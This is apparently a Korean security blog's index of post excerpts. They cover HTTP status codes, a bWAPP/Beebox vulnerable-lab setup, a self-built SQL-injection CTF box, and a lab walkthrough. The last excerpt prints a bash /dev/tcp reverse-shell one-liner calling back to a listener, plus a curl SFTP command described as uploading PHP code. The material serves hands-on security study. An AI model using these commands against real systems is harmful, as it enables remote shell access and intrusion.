MIN

300번대 리다이렉션 메세지400번대500번대 서버 에러 응답

linux - ubuntu - beebox 디스크 지정 후 설치 Beebox보안 취약점 실습을 위해 의도적으로 취약하게 만들어진 가상 운영체제 SQL 인젝션, XSS, 파일 업로드 등 다양한 웹 취약점들이 미리 포함된 bWAPP이라는 애플리케이션이 설치되어 있어, 공격과 방어 방법을 직접 연습할 수 있다. bWAPP v2.2 bug Hack Practice Beebox : 192.168.16.30Kali : 192.168.16.97 에서 진행A1 - Injection 1. HTML Injection - Reflected (GET) 2. HTML Injection - Reflected (POST) 3. HTML Injection - Reflected (Current URL) 4. HTM..

CTF Box's name : Pyramid 피라미드의 수수께끼를 풀고 숨겨진 보물(root_flag)을 찾는것이 목표 적용할 기법 : SQL Injection: DB에 비정상적인 구문을 입력하여 secret_info 의 존재를 확인하고 조회해서 다음단계로 가는 key 값 획득 CTF 제작 로드맵1. 메인 PHP 웹페이지 제작2. DB 구축 및 레코드 삽입3. 웹 페이지와 DB 연결4. SQL Injection 공격이 가능하도록 취약점 만들기 (php 페이지 수정)5. 공격가능한 SQL 구문 작성 및 페이로드 확인6. 의도했던 취약점 외 다른 취약점은 없는지 진단 및 조치 메인 페이지 이름 : 파라오 아카이브(Pharaoh Archives)역대 이집트의 고대 왕들에 대한 정보를 검색할 수 ..

Fuzzing : 파라미터 네임 무작위 대입 공격 다음 명령어를 사용하여 리버스 쉘을 생성 (Kali에서는 7777번 포트 리스닝)bash -c 'bash -i >& /dev/tcp/192.168.16.57/7777 0>&1' 하지만 이 코드 그대로 URL에 대입하면 접속되지않아서 URL로 인코딩하여 대입하기로 함 curl -si -u '' sftp://192.168.5.119/test -k 이 명령어는 SFTP 서버의 인증 과정 취약점을 이용해 PHP 코드를 업로드하는 시도입니다.curl -si: curl은 URL을 통해 데이터를 전송하는 도구입니다. -s는 진행 표시줄 등을 숨겨 조용히 실행하도록 하고, -i는 HTTP 응답 헤더를 포함하여 보여줍니다.-u '': -u는 사용자 ..